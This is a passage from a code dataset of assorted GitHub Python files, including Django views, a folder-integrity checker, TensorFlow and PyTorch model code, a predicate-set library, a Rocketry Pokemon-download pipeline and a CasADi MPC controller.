user.last_name = request.POST['first_name'], request.POST['last_name']\n        user.save()\n        return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef reply(request,id):\n    # fetch the comment outside the POST branch so the redirect below always works\n    comment = Comments.objects.get(id=id)\n    if request.method == 'POST':\n        reply = Reply()\n        reply.comment = comment\n        reply.reply = request.POST['reply']\n        reply.user = request.user\n        reply.save()\n\n    return redirect(\"/watch/\"+str(comment.video.id))\n\n@login_required\ndef commentlike(request,id):\n    # .get() raises DoesNotExist when there is no like yet, so use .filter().first()\n    like = CommentLike.objects.filter(like=request.user).first()\n    if like:\n        like.delete()\n    else:\n        like = CommentLike()\n        like.comment = Comments.objects.get(id=id)\n        like.like = request.user\n        like.save()\n    return 
redirect(request.META.get('HTTP_REFERER'))","repo_name":"Laksh8/bing_watch","sub_path":"watch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"45241140340","text":"'''\r\nBenny's Plagiarism Filter\r\nChecks sets containing 64-bit hashcodes of programming assignment submission\r\nfiles and prints as output a set containing the hashcodes that have no\r\nduplicates.\r\n'''\r\n\r\nset_qty = int(input(\"Masukkan banyaknya set yang akan diinput: \"))\r\ncurr_set = set()\r\n\r\nprint(\"Untuk {} baris berikutnya, masukkan set yang berisi \".format(set_qty) +\r\n      \"hashcode yang akan dicek:\")\r\n\r\n'''\r\nAsks the user for set_qty sets as input.\r\nFor each input set, remove the spaces to normalize the set so that every\r\nelement is separated only by \",\". Strip the { and } at the beginning and end\r\nof the input, then build a new set a_set whose elements were separated\r\nby \", \". Store the elements of a_set in curr_set, and store the intersection\r\nof curr_set with each following a_set in intersections.\r\nAfter all sets have been merged into curr_set, remove the elements of\r\nintersections from curr_set.\r\n'''\r\n\r\nintersections = set()\r\nfor i in range(set_qty):\r\n    a_set = input().replace(' ', '').strip('{}')\r\n    a_set = set(a_set.split(','))\r\n    if i > 0:\r\n        intersections |= curr_set & a_set\r\n    curr_set |= a_set\r\ncurr_set -= intersections\r\n\r\n'''\r\nRemoves the empty string that may be in curr_set if exactly one of the input\r\nsets has exactly one element (no \", \").\r\nThen removes the ' marks, because the elements of curr_set are still strings.\r\n'''\r\ncurr_set.discard('')\r\nprint(str(curr_set).replace(\"'\", \"\"))\r\n","repo_name":"laymonage/TarungLabDDP1","sub_path":"lab/06/lab06_b_d.py","file_name":"lab06_b_d.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"id","doc_type":"code","stars":24,"dataset":"github-code","pt":"78"}
+{"seq_id":"24679043832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 11:47:03 2018\n\n@author: joykumardas\n\"\"\"\n\ndef fib(n):\n    a,b = 1,1\n    for i in range(n-1):\n        a,b = b,a+b\n    return a\nprint(fib(5))","repo_name":"bitsreset/python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"42800944433","text":"import os, sys, datetime, shutil, subprocess\r\n\r\n\r\nclass integrity:\r\n    def __init__(self,args=[]):\r\n        '''\r\n        input_dir -> str:\r\n            Input directory for integrity analysis\r\n        \r\n        report_path -> str:\r\n            Integrity report path\r\n\r\n        mode -> str: c or v\r\n            c = create: To generate integrity report\r\n            v = verify: To verify integrity report\r\n\r\n        options -> dict:\r\n            Other flags and options for execution\r\n            - force -> bool: Overwrite any existing reports\r\n\r\n        other intermittent variables used:\r\n            - resp: response of user inputs or subprocess outputs\r\n        '''\r\n\r\n        # defining object variables\r\n        self.input_dir: str = ''\r\n        self.report_path: str = ''\r\n        self.mode: str = ''\r\n        self.options: dict = {\r\n            'force': False\r\n        }\r\n\r\n        # execution\r\n        self.parse_inputs(args)\r\n        self.exec()\r\n    \r\n    # Functions for inputs ----------------------------------\r\n    def 
parse_inputs(self,args):\r\n if args:\r\n self.get_argument_inputs(args)\r\n self.stats()\r\n else:\r\n self.intro()\r\n self.get_manual_inputs()\r\n\r\n \r\n def get_argument_inputs(self,args):\r\n '''\r\n flags:\r\n -i: set input folder\r\n -r: set report path\r\n -f: set force flag\r\n '''\r\n\r\n self.input_dir = args[args.index('-i')+1]\r\n\r\n if 'c' in args: self.mode = 'c'\r\n elif 'v' in args: self.mode = 'v'\r\n\r\n if '-r' in args:\r\n resp = args[args.index('-r')+1]\r\n if os.path.isdir(resp): resp += '\\\\integrity_report.txt'\r\n else: resp = self.input_dir + '\\\\integrity_report.txt'\r\n self.report_path = resp\r\n \r\n if '-f' in args: self.options['force'] = True\r\n\r\n\r\n def get_manual_inputs(self):\r\n self.input_dir = input('\\nEnter input folder: ')\r\n\r\n resp = int(input('\\nSelect operation: 1. Create, 2. Verify\\nSelection: '))\r\n self.mode = ['c','v'][resp-1]\r\n\r\n ops = [\r\n 'Enter path to save report file (leave blank if you want to save it in the input folder)',\r\n 'Enter path of report file (leave blank if the report is present in the input folder)'\r\n ]\r\n resp = input(f'\\n{ops[resp-1]}\\nReport path: ')\r\n if not resp: resp = self.input_dir\r\n if os.path.isdir(resp): resp += '\\\\integrity_report.txt'\r\n self.report_path = resp\r\n\r\n\r\n # Execution --------------------------------------------\r\n def exec(self):\r\n if self.mode == 'c': self.create_report()\r\n elif self.mode == 'v': self.verify_report()\r\n\r\n \r\n def create_report(self):\r\n # checking if report file already exists\r\n if os.path.isfile(self.report_path) and not self.options['force']:\r\n resp = input('\\nReport already exists. Do you want to overwrite? (y/n): ').lower()\r\n if resp == 'y': pass\r\n elif resp == 'n': exit()\r\n else: raise ValueError(f'Invalid response: \"{resp}\" ')\r\n\r\n # priting execution time\r\n timestamp = datetime.datetime.now()\r\n timestamp_formatted = timestamp.strftime(\"%B %d, %Y %I:%M:%S %p\")\r\n print(f'\\n* {timestamp_formatted}\\n')\r\n \r\n # execution: getting current tree structure\r\n print('• Running tree command : running',end='\\r',flush=True)\r\n cmd = f'tree /f /a \"{self.input_dir}\"'\r\n resp = subprocess.run(cmd, shell=True, capture_output=True)\r\n data = resp.stdout.decode('utf-8').split('\\r\\n')\r\n clear_line()\r\n print('• Running tree command : done',end='\\n',flush=True)\r\n\r\n # execution: attaching timestamp\r\n print('• Attaching timestamp : running',end='\\r',flush=True)\r\n data[1] += f' | {timestamp_formatted}'\r\n clear_line()\r\n print('• Attaching timestamp : done',end='\\n',flush=True)\r\n\r\n # execution: saving report file\r\n print('• Saving report file : running',end='\\r',flush=True)\r\n with open(self.report_path, 'w') as file:\r\n file.write('\\n'.join(data))\r\n clear_line()\r\n print('• Saving report file : done',end='\\n',flush=True)\r\n\r\n\r\n def verify_report(self):\r\n # excution: reading report data\r\n print('\\n• Reading report data : running',end='\\r',flush=True)\r\n with open(self.report_path,'r') as file:\r\n data = file.read()\r\n report_data = data.split('\\n')\r\n clear_line()\r\n print('• Reading report data : done',end='\\n',flush=True)\r\n\r\n # execution: getting current tree structure\r\n print('• Running tree command : running',end='\\r',flush=True)\r\n cmd = f'tree /f /a \"{self.input_dir}\"'\r\n resp = subprocess.run(cmd, shell=True, capture_output=True)\r\n current_data = resp.stdout.decode('utf-8').split('\\r\\n')\r\n clear_line()\r\n print('• Running tree command : 
done',end='\\n',flush=True)\r\n\r\n # execution: remove if integrity file entry exists\r\n val = '| integrity_report.txt'\r\n print('• Removing report entry : running',end='\\r',flush=True)\r\n if val in report_data: report_data.remove(val)\r\n if val in current_data: current_data.remove(val)\r\n clear_line()\r\n print('• Removing report entry : done',end='\\n',flush=True) \r\n\r\n # execution: Integrity check\r\n print('\\nIntegrity check:')\r\n timestamp = report_data[1].split(' | ')[-1]\r\n print(f'Report generated on : {timestamp}')\r\n if report_data[3:] == current_data[3:]: print('Integrity test : Passed',end='\\n',flush=True)\r\n else: print('Integrity test : Failed',end='\\n',flush=True)\r\n pass\r\n\r\n \r\n\r\n # Object representation --------------------------------\r\n def __repr__(self):\r\n repr = f'Integrity(\\n\\tinput_dir: \"{self.input_dir}\"\\n\\toperation: {[\"create\",\"verify\"][[\"c\",\"v\"].index(self.mode)]}\\n\\treport_path: \"{self.report_path}\"\\n\\toptions: {self.options}\\n)'\r\n return repr\r\n \r\n\r\n def intro(self):\r\n os.system('title Folder Integrity')\r\n term_width = shutil.get_terminal_size()[0]\r\n title = f'{\"-\"*5} FOLDER INTEGRITY {\"-\"*5}'.center(term_width)\r\n print(title)\r\n\r\n \r\n def stats(self):\r\n self.intro()\r\n print(f'\\nInput folder: \"{self.input_dir}\"')\r\n print(f'Report path: \"{self.report_path}\"')\r\n print(f'Operation: {[\"CREATE\",\"VERIFY\"][[\"c\",\"v\"].index(self.mode)]}', end='')\r\n if self.options['force']: print(f' -FORCE')\r\n else: print()\r\n\r\n\r\ndef clear_line():\r\n width = shutil.get_terminal_size()[0]\r\n print(\" \"*width,end='\\r')\r\n\r\n\r\nif __name__ == '__main__':\r\n os.system('cls')\r\n args = sys.argv[1:]\r\n obj = integrity(args)\r\n","repo_name":"SeshuTarapatla/Folder-Integrity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5542765881","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport numpy as np\n\nclass PositionalEncoding(tf.keras.Model):\n \"\"\"\n reference: https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/r2/tutorials/text/transformer.ipynb#scrollTo=1Rz82wEs5biZ\n\n \"\"\"\n def __init__(self, max_len_position, embed_dim):\n super(PositionalEncoding, self).__init__(name='PositionalEncoding')\n self.pos_encoding = self.positional_encoding(max_len_position, embed_dim)\n\n def get_angles(self, pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i // 2)) / np.float32(d_model))\n return pos * angle_rates\n\n def positional_encoding(self, max_len_position, embed_dim):\n angle_rads = self.get_angles(np.arange(max_len_position)[:, np.newaxis],\n np.arange(embed_dim)[np.newaxis, :], embed_dim)\n\n # apply sin to even indices in the array; 2i\n sines = np.sin(angle_rads[:, 0::2])\n # apply cos to odd indices in the array; 2i+1\n cosines = np.cos(angle_rads[:, 1::2])\n pos_encoding = np.concatenate([sines, cosines], axis=-1)\n pos_encoding = pos_encoding[np.newaxis, ...]\n\n return tf.cast(pos_encoding, dtype=tf.float32)\n\n\n def call(self, x):\n seq_len = tf.shape(x)[1]\n return self.pos_encoding[:, :seq_len, :]\n\n\ndef main():\n print(\"PositionalEncoding\")\n\n\nif __name__ == '__main__':\n 
main()","repo_name":"eagle705/bert","sub_path":"model/embedding/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"43381739712","text":"from Matriz import Matriz_O\n\nfila = 3\ncolumna = 3\nMatrix = Matriz_O()\ndato =\"BBW WWB BWW\"\n##lista = list()\n#cont =0\nfor i in dato:\n##lista.append(cont, i)\n#cont+=1\n print(i)\n\nlista = list(dato)\n\n##cont=0\n\nfor i in range(1,fila+1):\n for j in range(1,columna+1):\n ##Matrix.ingresardatos(lista.pop(cont),i,j)\n ##cont+=1\n Matrix.ingresardatos(lista.pop(0),i,j)\n print(str(i)+\" \",str(j)+\" \",str(i+j))\nprint(\"------------------------------------------------------------\")\nprint(Matrix.mostrarMatriz())","repo_name":"BrayanPradoMarroquin/Tutorias_TDAS","sub_path":"MATRICES/ORTOGONAL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36876848826","text":"import torch\nimport torch.nn as nn\nimport torchvision\n\nclass vgg16_FCN(nn.Module):\n THIRD_POOLING_INDEX = 16\n FORTH_POOLING_INDEX = 23\n def __init__(self, n_class = 1):\n super(vgg16_FCN, self).__init__()\n self.vgg16 = torchvision.models.vgg16(pretrained=True).features\n \n self.fc6 = nn.Conv2d(512, 4096, 1)\n self.relu6 = nn.ReLU(inplace=True)\n self.droput6 = nn.Dropout2d()\n \n self.fc7 = nn.Conv2d(4096, 4096, 1)\n self.relu7 = nn.ReLU(inplace=True)\n self.droput7 = nn.Dropout2d()\n \n self.direct_score = nn.Conv2d(4096, n_class, 1)\n self.third_pool = nn.Conv2d(256, n_class, 1)\n self.forth_pool = nn.Conv2d(512, n_class, 1)\n \n self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 2, stride=2, bias=False)\n self.upscore_pool4 = nn.ConvTranspose2d(n_class, n_class, 2, stride=2, bias=False)\n self.upscore8 = nn.ConvTranspose2d(n_class, n_class, 8, stride=8, bias=False)\n \n def forward(self, batch):\n prev_layer_output = batch\n layers_outputs = []\n with torch.no_grad():\n for i, layer in enumerate(self.vgg16):\n prev_layer_output = layer(prev_layer_output)\n layers_outputs.append(prev_layer_output)\n \n h = prev_layer_output\n \n h = self.fc6(h)\n h = self.relu6(h)\n h = self.droput6(h)\n\n h = self.fc7(h)\n h = self.relu7(h)\n h = self.droput7(h)\n \n direct_score = self.direct_score(h)\n direct_score = self.upscore2(direct_score)\n \n third_pooling_output = layers_outputs[vgg16_FCN.THIRD_POOLING_INDEX]\n forth_pooling_output = layers_outputs[vgg16_FCN.FORTH_POOLING_INDEX]\n \n forth_pool_skip_conection = self.forth_pool(forth_pooling_output)\n h = direct_score + forth_pool_skip_conection\n h = self.upscore_pool4(h)\n \n third_pool_skip_connection = self.third_pool(third_pooling_output)\n \n h = h + third_pool_skip_connection\n \n h = self.upscore8(h)\n \n return h","repo_name":"ArtemBoyarintsev/cell_segmentation","sub_path":"FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40549570456","text":"from django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework import status, authentication, permissions\n\nfrom .models 
import MyUser\nfrom .serializers import MyUserSerializer\n\n\nclass MyUserDetail(APIView):\n\tdef get(self, request, username, format=None):\n\t\tuser = User.objects.get(username=username)\n\t\tprofile = MyUser.objects.get(user=user)\n\t\tserializer = MyUserSerializer(profile)\n\t\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef create_profile(request):\n\t\tprofile = MyUser(user=request.user,name=request.data['username'])\n\t\tprofile.save()\n\t\tserializer = MyUserSerializer(profile)\n\t\treturn Response(serializer.data, status.HTTP_201_CREATED)\n\n\n@api_view(['POST'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef follow_or_unfollow(request):\n\t\tfollowed_user = User.objects.get(username=request.data['username'])\n\t\tuser = MyUser.objects.get(user=request.user)\n\t\tif followed_user in user.friends.all():\n\t\t\tuser.friends.remove(followed_user)\n\t\t\treturn Response(\"user deleted\")\n\t\telse:\n\t\t\tserializer = MyUserSerializer(followed_user)\n\t\t\tuser.friends.add(followed_user)\n\t\t\treturn Response(serializer.data, status.HTTP_201_CREATED)\n\n\n@api_view(['GET'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef get_followed(request):\n\t\tuser = MyUser.objects.get(user=request.user)\n\t\tfollowed = []\n\t\tfor friend in user.friends.all():\n\t\t\tfollowed.append(User.objects.get(pk=friend.id))\n\t\tserializer = MyUserSerializer(followed, many=True)\n\t\treturn Response(serializer.data)\n\n\n@api_view(['PUT'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef update_profile(request):\n\tprofile = MyUser.objects.get(user=request.user)\n\tprofile.bio_description = request.data[\"bio_description\"]\n\tprofile.name = request.data[\"name\"]\n\ttry:\n\t\tprofile.profile_image_url = request.data['profile_image']\n\texcept:\n\t\tpass\n\ttry:\n\t\tprofile.cover_image_url = request.data['cover_image']\n\texcept:\n\t\tpass\n\tprofile.save()\n\tserializer = MyUserSerializer(profile)\n\treturn Response(serializer.data)\n\n\nclass SearchUser(APIView):\n\t\tdef get(self, request, query, format=None):\n\t \t\tusers = MyUser.objects.filter(Q(name__icontains=query))\n\t \t\tserializer = MyUserSerializer(users, many=True)\n\t \t\treturn Response(serializer.data)\n\n","repo_name":"PallasCodes/microddit_api","sub_path":"myuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37479556914","text":"from rest_framework import serializers\nfrom database.models import Company\n\n\nclass CompanySerializer(serializers.ModelSerializer):\n class Meta:\n model = Company\n fields = \"__all__\"\n\n def create(self, validated_data):\n company = Company(\n company_name=validated_data['company_name']\n )\n company.save()\n return company\n","repo_name":"WobitaDream/Django_NewPointPlus","sub_path":"django/v1_shop/serializers/company_serializers.py","file_name":"company_serializers.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2818301667","text":"\"\"\"\nThis module provides implementations of Predicate Sets.\nA predicate set is a 
collection of predicates that are\nall evaluated against a single input to find all matching\npredicates. It provides both a naive implementation that\nsequentially evaluates predicates, as well as an optimizing\nimplementation.\n\"\"\"\nfrom .merge import merge, refactor\nfrom .predicate import LiteralResolver\nfrom . import ast\n\n\nclass PredicateSet(object):\n \"\"\"\n This class implements a naive predicate set. It provides\n no optimizations and does a sequential evaluation of\n each predicate.\n \"\"\"\n def __init__(self, preds=None):\n self.predicates = set([])\n if preds:\n self.update(preds)\n\n def add(self, p):\n \"Updates the set with a new predicate\"\n self.update([p])\n\n def update(self, preds):\n \"Update the set with a union of the new predicates\"\n for p in preds:\n if not p.is_valid():\n raise ValueError(\"Invalid predicate provided!\")\n self.predicates.update(preds)\n\n def evaluate(self, doc):\n \"\"\"\n Evaluates the predicates against the document.\n Returns a list of matching predicates\n \"\"\"\n match = []\n for p in self.predicates:\n if p.evaluate(doc):\n match.append(p)\n return match\n\n\nclass OptimizedPredicateSet(LiteralResolver):\n \"\"\"\n This class implements an optimizing predicate set.\n Internally, the predicates are rewritten and merged\n into a single AST that can be evaluated in a single pass.\n \"\"\"\n def __init__(self, preds=None, settings=None):\n LiteralResolver.__init__(self)\n self.settings = settings\n self.predicates = set([])\n self.ast = None\n self.finalized = False\n if preds:\n self.update(preds)\n\n def add(self, p):\n \"\"\"\n Updates the set with a new predicate. This will invalidate\n the current AST. It is not recommended to interleave add/evaluate.\n \"\"\"\n self.update([p])\n\n def update(self, preds):\n \"Update the set with a union of the new predicates\"\n if self.finalized:\n raise Exception(\"Cannot alter a finalized set!\")\n\n for p in preds:\n if not p.is_valid():\n raise ValueError(\"Invalid predicate provided!\")\n\n old_l = len(self.predicates)\n self.predicates.update(preds)\n if len(self.predicates) != old_l:\n self.ast = None\n\n def description(self, max_depth=0):\n \"Provides a tree like human readable description of the predicate\"\n if self.ast is None:\n self.compile_ast()\n return self.ast.description(max_depth=max_depth)\n\n def evaluate(self, doc):\n \"\"\"\n Evaluates the predicates against the document.\n Returns a list of matching predicates\n \"\"\"\n if self.ast is None:\n self.compile_ast()\n\n # Set the results array so that the ast can push the matches\n results = []\n self._results = results\n\n # Evaluate\n self.ast.evaluate(self, doc)\n\n # Reset the results array and return this instance\n self._results = None\n return results\n\n def analyze(self, document):\n \"\"\"\n Evaluates a predicate against the input document,\n while trying to provide additional information about\n the cause of failure. 
This is generally much slower\n        than using the equivalent `evaluate`.\n\n        Returns a tuple of (Result, Matches, Ctx).\n        Result is a boolean, Matches a list of predicates\n        and ctx is the evaluation context, containing among other\n        things the failure reasons and all of the literal resolution values.\n        The failed attribute has all the failure reasons in order.\n        The literals attribute contains the resolved values for all literals.\n        \"\"\"\n        if self.ast is None:\n            self.compile_ast()\n\n        # Set the results array so that the ast can push the matches\n        results = []\n        self._results = results\n\n        # Analyze\n        res, ctx = self.ast.analyze(self, document)\n\n        # Reset the results array and return this instance\n        self._results = None\n        return res, results, ctx\n\n    def compile_ast(self):\n        \"\"\"\n        Forces compilation of the internal ast tree.\n        This must be done after any changes to the set of\n        predicates.\n        \"\"\"\n        if self.finalized:\n            raise Exception(\"Cannot compile a finalized set!\")\n        if self.predicates:\n            merged = merge(list(self.predicates))\n            self.ast = refactor(self, merged, self.settings)\n        else:\n            self.ast = ast.Constant(True)\n\n    def push_match(self, match):\n        \"\"\"\n        This method is only to be invoked by the AST tree\n        to push results during an evaluation.\n        \"\"\"\n        self._results.append(match)\n\n    def finalize(self):\n        \"\"\"\n        This method can be invoked to 'finalize'. Once\n        this is done, the set cannot be altered. However,\n        lots of extraneous data can be purged to save memory.\n\n        This WILL clear the predicate string and AST from all\n        input predicates. Use only with caution.\n        \"\"\"\n        # Ensure the AST is compiled first\n        if self.ast is None:\n            self.compile_ast()\n\n        # Clear the sub-AST's and string predicates\n        for p in self.predicates:\n            p.predicate = None\n            p.ast = None\n\n        # Remove our set, the AST has it\n        self.predicates = None\n\n        # Set as finalized\n        self.finalized = True\n\n","repo_name":"armon/pypred","sub_path":"pypred/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"78"}
+{"seq_id":"23922919870","text":"import logging\nfrom os import makedirs\nfrom pathlib import Path\nfrom datetime import date\nfrom random import randint\n\nfrom rocketry import Rocketry\nfrom httpx import AsyncClient, stream\nfrom rocketry.args import Arg, Return\nfrom rocketry.conds import (\n    after_success, \n    after_finish,\n    after_fail\n    )\n\n# logger configuration\n\"\"\"\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.DEBUG)\ntask_logger = logging.getLogger('rocketry.task')\ntask_logger.addHandler(handler)\n\"\"\"\n\nPOKE_API = \"https://pokeapi.co/api/v2/pokemon/{}\"\nDOLAR_API = \"https://economia.awesomeapi.com.br/json/daily/USD-AOA/?start_date={}&end_date={}\"\n\nscheduler = Rocketry(execution='async')\n\n@scheduler.param('date')\ndef random_date_generator() -> str:\n    \"\"\"generate a random date and format it\"\"\"\n    day = randint(1, 28)\n    month = randint(1, 12)\n    year = randint(2021, 2022)\n\n    random_date = date.today()\\\n        .replace(day=day, month=month, year=year)\n\n    formated_date = random_date.strftime('%Y%m%d')\n    return formated_date\n\n@scheduler.task('every 5s', name='get quotation of dollar')\nasync def get_dollar(date: str=Arg('date')) -> str:\n    \"\"\"get the dollar quotation from the economia api\"\"\"\n    async with AsyncClient() as client:\n        response = (await client.get(DOLAR_API.format(date, date))).json()\n\n    if response: \n        return response[0]['high'][:3] # 569.628 -> 
569\n\n@scheduler.task(after_fail(get_dollar))\ndef get_dollar_fail():\n    \"\"\"get dollar failed; here we can notify that the process failed, or anything else\"\"\"\n    print(\"get dollar fail\")\n\n@scheduler.task(after_success(get_dollar))\nasync def get_pokemon_json(dollar: str = Return(get_dollar)) -> list:\n    \"\"\"get the pokemon whose number is the formatted dollar value\"\"\"\n    async with AsyncClient() as client:\n        response = (await client.get(POKE_API.format(dollar))).json()\n    return response\n\n@scheduler.task(after_fail(get_pokemon_json))\ndef get_pokemon_json_fail():\n    \"\"\"get pokemon failed; here we can notify that the process failed, or anything else\"\"\"\n    print(\"get pokemon fail\")\n\n@scheduler.task(after_success(get_pokemon_json))\ndef get_pokemon_sprite_url(poke_json: list = Return(get_pokemon_json)):\n    \"\"\"return only the default front sprite of the pokemon and its name\"\"\"\n    return poke_json['sprites']['front_default'], poke_json['name']\n\n@scheduler.task(after_success(get_pokemon_sprite_url))\ndef download_pokemon_sprite(\n    poke_data: tuple = Return(get_pokemon_sprite_url),\n    poke_number: str = Return(get_dollar) \n    ):\n    \"\"\"get poke data to download\"\"\" \n    url, name = poke_data\n    \n    file = Path(f'{poke_number}_{name}.png')\n    with open(file, 'wb') as download_file:\n        with stream('GET', url) as strm:\n            for chunk in strm.iter_bytes():\n                download_file.write(chunk)\n    \n    return file\n\n@scheduler.task(after_finish(download_pokemon_sprite))\ndef move_sprite(path: Path = Return(download_pokemon_sprite)):\n    \"\"\"move the downloaded sprite to a dir\"\"\" \n    makedirs('sprites', exist_ok=True)\n\n    folder = Path('sprites')\n    path.rename(folder / path)\n\nscheduler.run()\n","repo_name":"Antonio-Gabriel/pokedollar_pipeline_rocketry","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"33187107643","text":"# program sortJual\n# Reads a file, then sorts it by its\n# KdProduk category and prints the result\n# to the screen.\n\nimport tulisdata\n\n# KAMUS (declarations)\n# constant MARK : string = \"99999999\"\nMARK = \"99999999\"\n\n# type dataJual : < KdKategori: string, KdProduk: string, Hasil: integer >\n\n# f : SEQFILE of dataJual\n# (*) data : string\n# (1) \"99999999\"\n\n# db : Array of dataJual\n# namafile: string\n\n# MAIN PROGRAM ALGORITHM\nnamafile = input()\ntulisdata.TulisDataJual(namafile)\n\nf = open(namafile, \"r\")\ndata = f.readline()\ndb = []\n\nif data == MARK:\n    print(\"File kosong\")\nelse:\n    while(data != MARK):\n        obj = {}\n        obj[\"KdKategori\"] = data[:-1]\n        obj[\"KdProduk\"] = f.readline()[:-1]\n        obj[\"Hasil\"] = int(f.readline())\n        db.append(obj)\n\n        data = f.readline()\n    \n    # SORTING\n    for i in range(len(db)):\n        minKategori = i\n\n        for j in range(i,len(db)):\n            if(db[minKategori][\"KdKategori\"] > db[j][\"KdKategori\"]):\n                minKategori = j\n        \n        # SWAPPING\n        tmp = db[i]\n        db[i] = db[minKategori]\n        db[minKategori] = tmp\n    \n    # Printing to the screen\n    for i in db:\n        print(\"%s,%s,%d\" % (i[\"KdKategori\"], i[\"KdProduk\"], i[\"Hasil\"]))\n","repo_name":"bayusamudra5502/Daspro","sub_path":"Prosedural/Praktikum 6/sortjual.py","file_name":"sortjual.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"1131773882","text":"from casadi import * # type: ignore\nimport random \nimport matplotlib.pyplot as plt # type: ignore\nimport numpy as np\nimport time\nimport math\n\nclass IO_linearization_MPC:\n    \"\"\"Class for a 
Nonlinear Model Predictive Control law based on CasADi \n    \"\"\"\n    def __init__(self,horizon, b, dt):\n        \"\"\"Init func\n        Args:\n            horizon (float): how many steps to look into the future\n            b (float): offset of the linearized output point from the robot center\n            dt (float): sampling time\n        \"\"\"\n        self.N = horizon\n        self.acc_max = 5\n\n        self.b = b\n        \n\n        self.n_actionsMPC = 2\n        self.dt = dt\n        self.numberState = 2\n\n        self.Q_pos = 100\n        self.R = 10\n\n        self.initialize_casadi()\n\n\n    def reset(self,):\n        \"\"\"Every control class should have a reset function\n        \"\"\"\n        return\n\n\n    def initialize_casadi(self):\n        \"\"\"Initialize the casadi optimal control problem\n        \"\"\"\n\n        # Casadi problem formulation ---------------------------------------\n        self.opti = Opti() # Optimization problem\n        \n        # Decision variables ---------------------------------------\n        self.X_casadi = self.opti.variable(self.numberState,self.N+1) # state trajectory\n        self.x_casadi = self.X_casadi[0,:]\n        self.y_casadi = self.X_casadi[1,:]\n        \n\n        self.U_casadi = self.opti.variable(self.n_actionsMPC,self.N) # control trajectory\n\n        # Initial State Constraint -----------------------------------\n        self.x_0 = self.opti.parameter()\n        self.y_0 = self.opti.parameter()\n        \n        self.opti.subject_to(self.x_casadi[0]==self.x_0)\n        self.opti.subject_to(self.y_casadi[0]==self.y_0)\n        \n\n        # State Constraints and Cost Function -------------------------\n        self.set_kinematics()\n        self.set_constraints()\n        self.set_cost_function()\n        \n        # Solver parameters ---------------------------------------\n        p_opts = dict(print_time=False, verbose=False) \n        s_opts = dict(print_level=0)\n        self.opti.solver(\"ipopt\",p_opts,s_opts) # set numerical backend\n\n\n    def set_kinematics(self):\n        \"\"\"Setting the kinematics constraints\n        \"\"\"\n        # Kinematic Constraints ---------------------------------------\n        for k in range(self.N): # loop over control intervals\n            next_x = self.X_casadi[0,k] + self.U_casadi[0,k]*self.dt\n            next_y = self.X_casadi[1,k] + self.U_casadi[1,k]*self.dt\n            \n            self.opti.subject_to(self.X_casadi[0,k+1]==next_x) # close the gaps\n            self.opti.subject_to(self.X_casadi[1,k+1]==next_y) # close the gaps\n        \n    \n    def set_constraints(self):\n        \"\"\"Setting input constraints\n        \"\"\"\n        for k in range(self.N): # loop over control intervals\n            # x velocity of the linearized output point\n            self.opti.subject_to(self.U_casadi[0,k] <= self.acc_max)\n            self.opti.subject_to(self.U_casadi[0,k] >= -self.acc_max)\n            # y velocity of the linearized output point\n            self.opti.subject_to(self.U_casadi[1,k] <= self.acc_max)\n            self.opti.subject_to(self.U_casadi[1,k] >= -self.acc_max)\n\n\n\n    def set_cost_function(self):\n        \"\"\"Setting the cost function\n        \"\"\"\n\n        # Parametric Cost Function -------------------------------------\n        pose_error = 0\n        input_use = 0\n        \n        self.reference_x = self.opti.parameter(self.N+1)\n        self.reference_y = self.opti.parameter(self.N+1)\n        \n\n\n        for k in range(1, self.N):\n            ref_x = self.reference_x[k-1]\n            ref_y = self.reference_y[k-1]\n            \n\n            pose_error += self.Q_pos*(self.x_casadi[k] - ref_x)@(self.x_casadi[k] - ref_x).T\n            pose_error += self.Q_pos*(self.y_casadi[k] - 